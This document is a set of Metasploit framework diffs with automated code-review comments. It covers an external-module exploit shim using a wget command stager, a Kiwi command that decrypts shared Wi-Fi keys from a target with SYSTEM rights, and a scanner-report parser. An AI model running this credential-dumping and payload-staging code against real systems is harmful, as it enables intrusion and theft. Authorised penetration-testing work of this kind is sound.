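Review bot: In `PyBridge#initialize`, when PYTHONPATH is unset the merged value begins with a bare separator, which the interpreter sees as an empty path entry; on CPython an empty entry is treated as the current working directory, so module imports in external modules would also search whatever directory the console was launched from (confirm against the interpreter in use). Build the value without the empty segment, e.g. `extra = File.expand_path('../python', __FILE__)` followed by `self.env = self.env.merge('PYTHONPATH' => [ENV['PYTHONPATH'], extra].reject { |p| p.nil? || p.empty? }.join(File::PATH_SEPARATOR))`. Separately, `self.applies?` uses `$`, which in Ruby matches at any line end rather than the end of the string; `module_name.end_with?('.py')` is the precise check. `Bridge.open` returning nil for an unrecognised path is fine here, but its callers must handle it (raised on the Shim hunk).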


@ -0,0 +1,20 @@
import sys, os, json
def log(message, level='info'):
print(json.dumps({'jsonrpc': '2.0', 'method': 'message', 'params': {
'level': level,
'message': message
}}))
sys.stdout.flush()
def run(metadata, exploit):
req = json.loads(os.read(0, 10000))
if req['method'] == 'describe':
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': metadata}))
elif req['method'] == 'run':
args = req['params']
exploit(args)
print(json.dumps({'jsonrpc': '2.0', 'id': req['id'], 'response': {
'message': 'Exploit completed'
}}))
sys.stdout.flush()
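Review bot: `run` reads the request with a single `os.read(0, 10000)`, so a request that arrives in more than one pipe chunk or exceeds 10000 bytes (the `run` message carries the whole datastore) is truncated and `json.loads` raises rather than the module answering; read until a complete JSON document has been received. An unrecognised `method` is also silently ignored, leaving the caller waiting; reporting it through `log` with level `'error'` would make the failure visible. The helper below replaces only the first line of `run`.
```python
def _read_request():
    # Accumulate stdin until a complete JSON document arrives; a single
    # os.read() may return only part of the message.
    buf = b''
    while True:
        chunk = os.read(0, 10000)
        if not chunk:
            raise EOFError('stdin closed before a complete request arrived')
        buf += chunk
        try:
            return json.loads(buf.decode('utf-8'))
        except ValueError:
            continue

def run(metadata, exploit):
    req = _read_request()
    # … unchanged: describe / run dispatch …
```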


@ -4,98 +4,56 @@ require 'msf/core/modules/external/bridge'
class Msf::Modules::External::Shim
def self.generate(module_path)
mod = Msf::Modules::External::Bridge.new(module_path)
mod = Msf::Modules::External::Bridge.open(module_path)
return '' unless mod.meta
case mod.meta['type']
when 'remote_exploit.cmd_stager.wget'
when 'remote_exploit_cmd_stager'
remote_exploit_cmd_stager(mod)
end
end
def self.render_template(name, meta = {})
template = File.join(File.dirname(__FILE__), 'templates', name)
ERB.new(File.read(template)).result(binding)
end
def self.common_metadata(meta = {})
render_template('common_metadata.erb', meta)
end
def self.mod_meta_common(mod, meta = {})
meta[:path] = mod.path.dump
meta[:name] = mod.meta['name'].dump
meta[:description] = mod.meta['description'].dump
meta[:authors] = mod.meta['authors'].map(&:dump).join(",\n ")
meta[:date] = mod.meta['date'].dump
meta[:references] = mod.meta['references'].map do |r|
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
end.join(",\n ")
meta[:options] = mod.meta['options'].map do |n, o|
"Opt#{o['type'].capitalize}.new(#{n.dump},
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
end.join(",\n ")
meta
end
def self.mod_meta_exploit(mod, meta = {})
meta[:wfsdelay] = mod.meta['wfsdelay'] || 5
meta[:privileged] = mod.meta['privileged'].inspect
meta[:platform] = mod.meta['targets'].map do |t|
t['platform'].dump
end.uniq.join(",\n ")
meta[:targets] = mod.meta['targets'].map do |t|
"[#{t['platform'].dump} + ' ' + #{t['arch'].dump}, {'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]"
end.join(",\n ")
meta
end
def self.remote_exploit_cmd_stager(mod)
%Q|
require 'msf/core/modules/external/bridge'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => #{mod.meta['name'].dump},
'Description' => #{mod.meta['description'].dump},
'Author' =>
[
#{mod.meta['authors'].map(&:dump).join(', ')}
],
'License' => MSF_LICENSE,
'References' =>
[
#{mod.meta['references'].map do |r|
"[#{r['type'].upcase.dump}, #{r['ref'].dump}]"
end.join(', ')}
],
'DisclosureDate' => #{mod.meta['date'].dump},
'Privileged' => #{mod.meta['privileged'].inspect},
'Platform' => [#{mod.meta['targets'].map{|t| t['platform'].dump}.uniq.join(', ')}],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
#{mod.meta['targets'].map do |t|
%Q^[#{t['platform'].dump} + ' ' + #{t['arch'].dump},
{'Arch' => ARCH_#{t['arch'].upcase}, 'Platform' => #{t['platform'].dump} }]^
end.join(', ')}
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => 5 }
))
register_options([
#{mod.meta['options'].map do |n, o|
"Opt#{o['type'].capitalize}.new(#{n.dump},
[#{o['required']}, #{o['description'].dump}, #{o['default'].inspect}])"
end.join(', ')}
], self.class)
end
def execute_command(cmd, opts)
mod = Msf::Modules::External::Bridge.new(#{mod.path.dump})
mod.run(datastore.merge(command: cmd))
wait_status(mod)
true
end
def exploit
print_status("Exploiting...")
execute_cmdstager({:flavor => :wget})
end
def wait_status(mod)
while mod.running
m = mod.get_status
if m
case m['level']
when 'error'
print_error m['message']
when 'warning'
print_warning m['message']
when 'good'
print_good m['message']
when 'info'
print_status m['message']
when 'debug'
vprint_status m['message']
else
print_status m['message']
end
end
end
end
end
|
meta = mod_meta_common(mod)
meta = mod_meta_exploit(mod, meta)
meta[:command_stager_flavor] = mod.meta['payload']['command_stager_flavor'].dump
render_template('remote_exploit_cmd_stager.erb', meta)
end
end
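Review bot: `generate` calls `mod.meta` directly on the result of `Bridge.open`, which returns nil when no loader applies, so an unrecognised module path raises NoMethodError instead of returning ''; guard it with `return '' unless mod && mod.meta`. The generated `execute_command` in remote_exploit_cmd_stager.erb has the same exposure on its own `Bridge.open` call. Also, `o['type']`, `o['required']` and `t['arch']` are interpolated raw into the generated Ruby (only the string fields are `.dump`ed), so a malformed value in the external module's metadata surfaces as a syntax error in the shim rather than a clear validation failure — a comment stating that these fields are assumed well-formed, or a check against the known Opt/ARCH names, would help. `render_template` relies on `ERB` being loaded elsewhere; confirm the file requires it.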


@ -0,0 +1,7 @@
'Name' => <%= meta[:name] %>,
'Description' => <%= meta[:description] %>,
'Author' =>
[
<%= meta[:authors] %>
],
'License' => MSF_LICENSE,


@ -0,0 +1,48 @@
require 'msf/core/modules/external/bridge'
require 'msf/core/module/external'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Module::External
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
<%= common_metadata meta %>
'References' =>
[
<%= meta[:references] %>
],
'DisclosureDate' => <%= meta[:date] %>,
'Privileged' => <%= meta[:privileged] %>,
'Platform' => [<%= meta[:platform] %>],
'Payload' =>
{
'DisableNops' => true
},
'Targets' =>
[
<%= meta[:targets] %>
],
'DefaultTarget' => 0,
'DefaultOptions' => { 'WfsDelay' => <%= meta[:wfsdelay] %> }
))
register_options([
<%= meta[:options] %>
])
end
def execute_command(cmd, opts)
mod = Msf::Modules::External::Bridge.open(<%= meta[:path] %>)
mod.run(datastore.merge(command: cmd))
wait_status(mod)
true
end
def exploit
print_status("Exploiting...")
execute_cmdstager({:flavor => :<%= meta[:command_stager_flavor] %>})
end
end


@ -28,7 +28,7 @@ module Msf
# @return [OptAddress]
def self.LHOST(default=nil, required=true, desc="The listen address")
Msf::OptAddress.new(__method__.to_s, [ required, desc, default ])
Msf::OptAddressLocal.new(__method__.to_s, [ required, desc, default ])
end
# @return [OptPort]


@ -0,0 +1,41 @@
# -*- coding: binary -*-
require 'network_interface'
module Msf
###
#
# Network address option.
#
###
class OptAddressLocal < OptAddress
def normalize(value)
return nil unless value.kind_of?(String)
if NetworkInterface.interfaces.include?(value)
ip_address = NetworkInterface.addresses(value).values.flatten.collect{|x| x['addr']}.select do |addr|
begin
IPAddr.new(addr).ipv4?
rescue IPAddr::InvalidAddressError => e
false
end
end
return false if ip_address.blank?
return ip_address.first
end
return value
end
def valid?(value, check_empty: true)
return false if check_empty && empty_required_value?(value)
return false unless value.kind_of?(String) or value.kind_of?(NilClass)
return true if NetworkInterface.interfaces.include?(value)
return super
end
end
end
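Review bot: `valid?` accepts any local interface name, but `normalize` returns `false` for an interface with no IPv4 address, so an IPv6-only interface passes validation and then yields `false` as the option value; make the two agree with `return !!normalize(value) if NetworkInterface.interfaces.include?(value)`. The header comment "Network address option." is copied from the parent and does not mention the new behaviour; `# Network address option that also accepts a local interface name, which normalize resolves to the interface's first IPv4 address.` describes it. Minor style points: the rescued `e` is unused, `or` should be `||`, and `blank?` presumes ActiveSupport is loaded in this context.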


@ -7,6 +7,7 @@ module Msf
autoload :OptBase, 'msf/core/opt_base'
autoload :OptAddress, 'msf/core/opt_address'
autoload :OptAddressLocal, 'msf/core/opt_address_local'
autoload :OptAddressRange, 'msf/core/opt_address_range'
autoload :OptBool, 'msf/core/opt_bool'
autoload :OptEnum, 'msf/core/opt_enum'


@ -411,6 +411,10 @@ module Msf
# Allow comma separated list of encoders so users can choose several
encoder.split(',').each do |chosen_encoder|
e = framework.encoders.create(chosen_encoder)
if e.nil?
cli_print "Skipping invalid encoder #{chosen_encoder}"
next
end
e.datastore.import_options_from_hash(datastore)
encoders << e if e
end
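Review bot: With the new `next` on a nil encoder, the trailing `encoders << e if e` can no longer see a nil `e`, so the guard is dead; `encoders << e` reads more honestly. The enclosing method starts and ends outside the hunk.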


@ -827,10 +827,33 @@ class Core
end
def cmd_route_help
print_line "Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]"
print_line
print_line "Route traffic destined to a given subnet through a supplied session."
print_line "The default comm is Local."
print_line
print_line "Usage:"
print_line " route [add/remove] subnet netmask [comm/sid]"
print_line " route [add/remove] cidr [comm/sid]"
print_line " route [get] <host or network>"
print_line " route [flush]"
print_line " route [print]"
print_line
print_line "Subcommands:"
print_line " add - make a new route"
print_line " remove - delete a route; 'del' is an alias"
print_line " flush - remove all routes"
print_line " get - display the route for a given target"
print_line " print - show all active routes"
print_line
print_line "Examples:"
print_line " Add a route for all hosts from 192.168.0.0 to 192.168.0.0 through session 1"
print_line " route add 192.168.0.0 255.255.255.0 1"
print_line " route add 192.168.0.0/24 1"
print_line
print_line " Delete the above route"
print_line " route remove 192.168.0.0/24 1"
print_line " route del 192.168.0.0 255.255.255.0 1"
print_line
print_line " Display the route that would be used for the given host or network"
print_line " route get 192.168.0.11"
print_line
end
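Review bot: The first example line describes a /24 as "all hosts from 192.168.0.0 to 192.168.0.0", which is a single address, not the range the two commands below it add; it should read `print_line "  Add a route for all hosts from 192.168.0.0 to 192.168.0.255 through session 1"`. The rest of the rewritten help reads well and the subcommand list matches the usage lines.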


@ -19,7 +19,7 @@ module Net # :nodoc:
name = ""
packetlen = packet.size
while true
raise ExpandError, "offset is greater than packet lenght!" if packetlen < (offset+1)
raise ExpandError, "offset is greater than packet length!" if packetlen < (offset+1)
len = packet.unpack("@#{offset} C")[0]
if len == 0


@ -24,6 +24,7 @@ module Rex
def start_document
@parse_warnings = []
@resolv_cache = {}
@host_object = nil
end
def start_element(name=nil,attrs=[])
@ -32,9 +33,12 @@ module Rex
@state[:current_tag][name] = true
case name
when "Scan" # Start of the thing.
when "Name", "StartURL", "Banner", "Os"
@state[:report_item] = {}
when "Name", "StartURL", "StartTime", "Banner", "Os", "Text", "Severity", "CWE", "URL", "Parameter"
@state[:has_text] = true
when "LoginSequence" # Skipping for now
when "ReportItem"
@state[:report_item] = {}
when "Crawler"
record_crawler(attrs)
when "FullURL"
@ -62,14 +66,56 @@ module Rex
# StartURL does not always include the scheme
@text.prepend("http://") unless URI.parse(@text).scheme
collect_host
collect_service
collect_service_from_url
@text = nil
handle_parse_warnings &block
host_object = report_host &block
if host_object
report_starturl_service(host_object,&block)
db.report_import_note(@args[:wspace],host_object)
@host_object = report_host &block
if @host_object
report_starturl_service(&block)
db.report_import_note(@args[:wspace],@host_object)
end
when "StartTime"
@state[:has_text] = false
@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')
@text = nil
when "Text"
@state[:has_text] = false
service = collect_service_from_kbitem_text
@text = nil
return unless service
handle_parse_warnings &block
if @host_object
report_kbitem_service(service,&block)
end
when "Severity"
@state[:has_text] = false
collect_report_item_severity
@text = nil
when "CWE"
@state[:has_text] = false
collect_report_item_cwe
@text = nil
when "URL"
@state[:has_text] = false
collect_report_item_reference_url
@text = nil
when "Parameter"
@state[:has_text] = false
collect_report_item_parameter
@text = nil
when "ReportItem"
vuln = collect_vuln_from_report_item
if vuln.nil?
@state[:page_request] = @state[:page_response] = nil
return
end
handle_parse_warnings &block
if @state[:vuln_info][:refs].nil?
report_web_vuln(&block)
else
report_other_vuln(&block)
end
@state[:page_request] = @state[:page_response] = nil
when "Banner"
@state[:has_text] = false
collect_and_report_banner
@ -134,7 +180,7 @@ module Rex
@report_data[:state] = Msf::HostState::Alive
end
def collect_service
def collect_service_from_url
return unless @report_data[:host]
return unless in_tag("Scan")
return unless @text
@ -146,6 +192,44 @@ module Rex
@report_data[:ports] << @state[:starturl_port]
end
def collect_service_from_kbitem_text
return unless @host_object
return unless in_tag("Scan")
return unless in_tag("KBase")
return unless in_tag("KBItem")
return unless @text
return if @text.strip.empty?
return unless @text =~ /server is running/
matched = / (?<name>\w+) server is running on (?<proto>\w+) port (?<portnum>\d+)\./.match(@text)
@report_data[:ports] ||= []
@report_data[:ports] << matched[:portnum]
return matched
end
def collect_vuln_from_report_item
@state[:vuln_info] = nil
return unless @host_object
return unless in_tag("Scan")
return unless in_tag("ReportItems")
return unless in_tag("ReportItem")
return unless @state[:report_item][:name]
return unless @state[:report_item][:severity]
return unless @state[:report_item][:severity].downcase == "high"
@state[:vuln_info] = {}
@state[:vuln_info][:name] = @state[:report_item][:name]
if @state[:page_request_verb].nil? && @state[:report_item][:name] =~ /deprecated/
# Treating this as a regular vuln, not web-specific
@state[:vuln_info][:refs] = ["ACX-#{@state[:report_item][:reference_url]}"]
unless @state[:report_item_cwe].nil?
@state[:vuln_info][:refs][0] << ",#{@state[:report_item][:cwe]}"
end
end
@state[:vuln_info][:severity] = @state[:report_item][:severity].downcase
@state[:vuln_info][:cwe] = @state[:report_item][:cwe]
return @state[:vuln_info]
end
def collect_and_report_banner
return unless (svc = @state[:starturl_service_object]) # Yes i want assignment
return unless @text
@ -165,7 +249,37 @@ module Rex
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item] = @text
@state[:report_item][:name] = @text
end
def collect_report_item_severity
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:severity] = @text
end
def collect_report_item_cwe
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:cwe] = @text
end
def collect_report_item_reference_url
return unless in_tag("ReportItem")
return unless in_tag("References")
return unless in_tag("Reference")
return unless @text
return if @text.strip.empty?
@state[:report_item][:reference_url] = @text
end
def collect_report_item_parameter
return unless in_tag("ReportItem")
return unless @text
return if @text.strip.empty?
@state[:report_item][:parameter] = @text
end
# @state[:fullurl] is set by report_web_site
@ -211,20 +325,26 @@ module Rex
def report_web_page(&block)
return if should_skip_this_page
return unless @state[:web_site]
@state[:page_request_verb] = nil
return unless @state[:page_request]
return if @state[:page_request].strip.empty?
return unless @state[:page_response]
return if @state[:page_response].strip.empty?
path,query_string = parse_request(@state[:page_request])
verb,path,query_string = parse_request(@state[:page_request])
return unless path
parsed_response = parse_response(@state[:page_response])
return unless parsed_response
@state[:page_request_verb] = verb
web_page_info = {}
if @state[:page_response].strip.blank?
web_page_info[:code] = ""
web_page_info[:headers] = {}
web_page_info[:body] = ""
else
parsed_response = parse_response(@state[:page_response])
return unless parsed_response
web_page_info[:code] = parsed_response[:code].to_i
web_page_info[:headers] = parsed_response[:headers]
web_page_info[:body] = parsed_response[:body]
end
web_page_info[:web_site] = @state[:web_site]
web_page_info[:path] = path
web_page_info[:code] = parsed_response[:code].to_i
web_page_info[:headers] = parsed_response[:headers]
web_page_info[:body] = parsed_response[:body]
web_page_info[:query] = query_string || ""
url = ""
url << @state[:web_site].service.name.to_s << "://"
@ -234,13 +354,51 @@ module Rex
return unless uri # Sanity checker
db.emit(:web_page, url, &block) if block
web_page_object = db_report(:web_page,web_page_info)
@state[:page_request] = @state[:page_response] = nil
@state[:web_page] = web_page_object
end
def report_web_vuln(&block)
return if should_skip_this_page
return unless @state[:web_page]
return unless @state[:web_site]
return unless @state[:vuln_info]
web_vuln_info = {}
web_vuln_info[:web_site] = @state[:web_site]
web_vuln_info[:path] = @state[:web_page][:path]
web_vuln_info[:query] = @state[:web_page][:query]
web_vuln_info[:method] = @state[:page_request_verb]
web_vuln_info[:pname] = ""
if @state[:page_response].blank?
web_vuln_info[:proof] = "<empty response>"
else
web_vuln_info[:proof] = @state[:page_response]
end
web_vuln_info[:risk] = 5
web_vuln_info[:params] = []
unless @state[:report_item][:parameter].blank?
# Acunetix only lists a single paramter...
web_vuln_info[:params] << [ @state[:report_item][:parameter].to_s, "" ]
end
web_vuln_info[:category] = "imported"
web_vuln_info[:confidence] = 100
web_vuln_info[:name] = @state[:vuln_info][:name]
db.emit(:web_vuln, web_vuln_info[:name], &block) if block
vuln = db_report(:web_vuln, web_vuln_info)
end
def report_other_vuln(&block)
return if should_skip_this_page
return unless @state[:vuln_info]
db.emit(:vuln, @state[:vuln_info][:name], &block) if block
db_report(:vuln, @state[:vuln_info].merge(:host => @host_object))
end
# Reasons why we shouldn't collect a particular web page.
def should_skip_this_page
if @state[:report_item] =~ /Unrestricted File Upload/
if @state[:report_item][:name] =~ /Unrestricted File Upload/
# This means that the page being collected is something the
# auditor put there, so it's not useful to report on.
return true
@ -259,6 +417,7 @@ module Rex
return unless verb
return unless req
path,query_string = req.split(/\?/)[0,2]
return verb,path,query_string
end
def parse_response(response)
@ -302,14 +461,14 @@ module Rex
# The service is super important, so we hang on to it for the
# rest of the scan.
def report_starturl_service(host_object,&block)
return unless host_object
def report_starturl_service(&block)
return unless @host_object
return unless @state[:starturl_uri]
name = @state[:starturl_uri].scheme
port = @state[:starturl_uri].port
addr = host_object.address
addr = @host_object.address
svc = {
:host => host_object,
:host => @host_object,
:port => port,
:name => name.dup,
:proto => "tcp"
@ -320,6 +479,22 @@ module Rex
end
end
def report_kbitem_service(service,&block)
return unless @host_object
return unless @state[:starturl_uri]
addr = @host_object.address
svc = {
:host => @host_object,
:port => service[:portnum].to_i,
:name => service[:name].dup.downcase,
:proto => service[:proto].dup.downcase
}
if service[:name] and service[:portnum]
db.emit(:service,[addr,service[:portnum]].join(":"),&block) if block
db_report(:service,svc)
end
end
def report_web_site(url,&block)
return unless in_tag("Crawler")
return unless url
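Review bot: `@state[:timestamp] = @text.to_s.tr!(',','').tr!('/','-')` in the new `StartTime` branch raises NoMethodError whenever the text contains no comma, because `tr!` returns nil when it makes no substitution; the non-bang form is what is wanted here, `@state[:timestamp] = @text.to_s.tr(',', '').tr('/', '-')`. In `collect_service_from_kbitem_text` the coarse `/server is running/` guard does not guarantee that the stricter named-capture regexp matches, so `matched[:portnum]` can be called on nil for an unexpectedly formatted KBItem; add `return unless matched` before the push. In `collect_vuln_from_report_item` the guard reads `@state[:report_item_cwe]`, a key nothing visible in this diff sets, while the appended value comes from `@state[:report_item][:cwe]`, so the CWE is apparently never added to the reference; the guard should be `unless @state[:report_item][:cwe].nil?`. Since this parser consumes scanner-produced XML, each of these turns slightly unexpected input into an aborted import rather than a skipped item. `start_element`'s body begins outside the hunk.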


@ -66,7 +66,7 @@ module Rex
# @param len [Integer] An optional URI length value, including the leading slash
# @return [String] The URI string for connections
def generate_uri_uuid(sum, uuid, len=nil)
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN+rand(URI_CHECKSUM_CONN_MAX_LEN-URI_CHECKSUM_UUID_MIN_LEN)
curl_uri_len = URI_CHECKSUM_UUID_MIN_LEN + rand(URI_CHECKSUM_CONN_MAX_LEN - URI_CHECKSUM_UUID_MIN_LEN)
curl_prefix = uuid.to_uri
if len


@ -379,6 +379,57 @@ class Kiwi < Extension
content.join('')
end
#
# Access and parse a set of wifi profiles using the given interfaces
# list, which contains the list of profile xml files on the target.
#
# @return [Hash]
def wifi_parse_shared(wifi_interfaces)
results = []
exec_cmd('"base64 /in:off /out:on"')
wifi_interfaces.keys.each do |key|
interface = {
:guid => key,
:desc => nil,
:state => nil,
:profiles => []
}
wifi_interfaces[key].each do |wifi_profile_path|
cmd = "\"dpapi::wifi /in:#{wifi_profile_path} /unprotect\""
output = exec_cmd(cmd)
lines = output.lines
profile = {
:name => nil,
:auth => nil,
:key_type => nil,
:shared_key => nil
}
while lines.length > 0 do
line = lines.shift.strip
if line =~ /^\* SSID name\s*: (.*)$/
profile[:name] = $1
elsif line =~ /^\* Authentication\s*: (.*)$/
profile[:auth] = $1
elsif line =~ /^\* Key Material\s*: (.*)$/
profile[:shared_key] = $1
end
end
interface[:profiles] << profile
end
results << interface
end
exec_cmd('"base64 /in:on /out:on"')
results
end
#
# List all the wifi interfaces and the profiles associated
# with them. Also show the raw text passwords for each.
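Review bot: In `wifi_parse_shared`, if `exec_cmd` raises part-way through the interface loop, the trailing `exec_cmd('"base64 /in:on /out:on"')` never runs and the extension is left with base64 input switched off for every later command; wrap the loop in `begin … ensure exec_cmd('"base64 /in:on /out:on"') end` so the mode is always restored. `profile[:key_type]` is initialised but never assigned by any of the three regexps, so every shared profile carries a nil type (the dispatcher papers over this with `|| 'Unknown'`); either parse it from the output or document on the method that the type is not available for shared profiles. As a point of style, the `while lines.length > 0 do … lines.shift` loop over `output.lines` reads more simply as `output.each_line do |line| … end`, with named captures or `Regexp.last_match(1)` in place of `$1`.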


@ -72,7 +72,8 @@ class Console::CommandDispatcher::Kiwi
'kerberos_ticket_list' => 'List all kerberos tickets (unparsed)',
'lsa_dump_secrets' => 'Dump LSA secrets (unparsed)',
'lsa_dump_sam' => 'Dump LSA SAM (unparsed)',
'wifi_list' => 'List wifi profiles/creds',
'wifi_list' => 'List wifi profiles/creds for the current user',
'wifi_list_shared' => 'List shared wifi profiles/creds (requires SYSTEM)',
}
end
@ -303,37 +304,50 @@ class Console::CommandDispatcher::Kiwi
end
#
# Dump all the wifi profiles/credentials
# Dump all the shared wifi profiles/credentials
#
def cmd_wifi_list_shared(*args)
interfaces_dir = '%AllUsersProfile%\Microsoft\Wlansvc\Profiles\Interfaces'
interfaces_dir = client.fs.file.expand_path(interfaces_dir)
files = client.fs.file.search(interfaces_dir, '*.xml', true)
if files.length == 0
print_error('No shared WiFi profiles found.')
else
interfaces = {}
files.each do |f|
interface_guid = f['path'].split("\\")[-1]
full_path = "#{f['path']}\\#{f['name']}"
interfaces[interface_guid] ||= []
interfaces[interface_guid] << full_path
end
results = client.kiwi.wifi_parse_shared(interfaces)
if results.length > 0
display_wifi_profiles(results)
else
print_line
print_error('No shared wireless profiles found on the target.')
end
end
true
end
#
# Dump all the wifi profiles/credentials for the current user
#
def cmd_wifi_list(*args)
results = client.kiwi.wifi_list
if results.length > 0
results.each do |r|
table = Rex::Text::Table.new(
'Header' => "#{r[:desc]} - #{r[:guid]}",
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type], p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state]}")
end
display_wifi_profiles(results)
else
print_line
print_error('No wireless profiles found on the target.')
end
print_line
return true
true
end
@@creds_opts = Rex::Parser::Arguments.new(
@ -401,6 +415,30 @@ class Console::CommandDispatcher::Kiwi
protected
def display_wifi_profiles(profiles)
profiles.each do |r|
header = r[:guid]
header = "#{r[:desc]} - #{header}" if r[:desc]
table = Rex::Text::Table.new(
'Header' => header,
'Indent' => 0,
'SortIndex' => 0,
'Columns' => [
'Name', 'Auth', 'Type', 'Shared Key'
]
)
print_line
r[:profiles].each do |p|
table << [p[:name], p[:auth], p[:key_type] || 'Unknown', p[:shared_key]]
end
print_line(table.to_s)
print_line("State: #{r[:state] || 'Unknown'}")
end
end
def check_is_domain_user(msg='Running as SYSTEM, function will not work.')
if client.sys.config.is_system?
print_warning(msg)
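Review bot: `cmd_wifi_list_shared` is advertised in the help table as requiring SYSTEM, but nothing in the method checks it, so a non-SYSTEM operator only sees the generic 'No shared WiFi profiles found.' error with no hint why; consider `print_warning('This command requires SYSTEM privileges.') unless client.sys.config.is_system?` before the search (the predicate is already used in `check_is_domain_user` below). The new branches compare lengths where predicates read better: `if files.empty?` in place of `if files.length == 0` and `unless results.empty?` in place of `if results.length > 0`. The `*args` parameter is accepted but never read; naming it `*_args` makes that explicit.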


@ -58,7 +58,7 @@ class Console::CommandDispatcher::Stdapi::Net
'-r' => [true, 'Forward: remote host to connect to.'],
'-p' => [true, 'Forward: remote port to connect to. Reverse: remote port to listen on.'],
'-R' => [false, 'Indicates a reverse port forward.'],
'-L' => [true, 'Forward: local host to listen on (optional). Remote: local host to connect to.'])
'-L' => [true, 'Forward: local host to listen on (optional). Reverse: local host to connect to.'])
#
# Options for the netstat command.


@ -65,9 +65,9 @@ Gem::Specification.new do |spec|
# are needed when there's no database
spec.add_runtime_dependency 'metasploit-model'
# Needed for Meterpreter
spec.add_runtime_dependency 'metasploit-payloads', '1.2.24'
spec.add_runtime_dependency 'metasploit-payloads', '1.2.28'
# Needed for the next-generation POSIX Meterpreter
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.8'
spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9'
# Needed by msfgui and other rpc components
spec.add_runtime_dependency 'msgpack'
# get list of network interfaces, like eth* from OS.
@ -77,7 +77,7 @@ Gem::Specification.new do |spec|
# Needed by anemone crawler
spec.add_runtime_dependency 'nokogiri'
# Needed by db.rb and Msf::Exploit::Capture
spec.add_runtime_dependency 'packetfu', '1.1.13.pre'
spec.add_runtime_dependency 'packetfu'
# For sniffer and raw socket modules
spec.add_runtime_dependency 'pcaprub'
# Needed for module caching in Mdm::ModuleDetails


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -35,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
OptString.new('PASSWORD', [ true, 'The password to reset to', 'admin'])
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
@ -61,7 +59,7 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('HIDE_IFRAME', [
true, "Hide the exploit iframe from the user", true
])
], self.class)
])
end
def on_request_uri(cli, request)


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -37,7 +35,7 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
OptPath.new('FILE', [true, 'Image to upload and show']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
], self.class)
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'uri'
class MetasploitModule < Msf::Auxiliary
@ -42,7 +41,7 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('TIME', [true, 'Time in seconds to show the video', 60]),
OptString.new('URL', [true, 'URL of video to show. Must use an IP address']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
], self.class)
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.


@ -4,8 +4,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::Tcp


@ -3,7 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'metasploit/framework/aws/client'
class MetasploitModule < Msf::Auxiliary


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -41,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
register_options(
[
Opt::RPORT(10000),
OptAddress.new('LHOST',
OptAddressLocal.new('LHOST',
[
false,
"The local IP address to accept the data connection"
@ -67,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
"backupexec_dump.mtf"
]
),
], self.class)
])
end
def run


@ -4,8 +4,6 @@
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
@ -48,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
"Compromised by Metasploit!\r\n"
]
),
], self.class)
])
end
def auxiliary_commands


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8008)
], self.class)
])
end
def run


@ -3,8 +3,6 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
@ -30,7 +28,7 @@ class MetasploitModule < Msf::Auxiliary
register_options([
Opt::RPORT(8008),
OptString.new('VID', [true, 'Video ID', 'kxopViU98Xo'])
], self.class)
])
end
def run


@ -2,8 +2,6 @@
# auxiliary/admin/cisco/cisco_asa_extrabacon.rb
##
require 'msf/core'
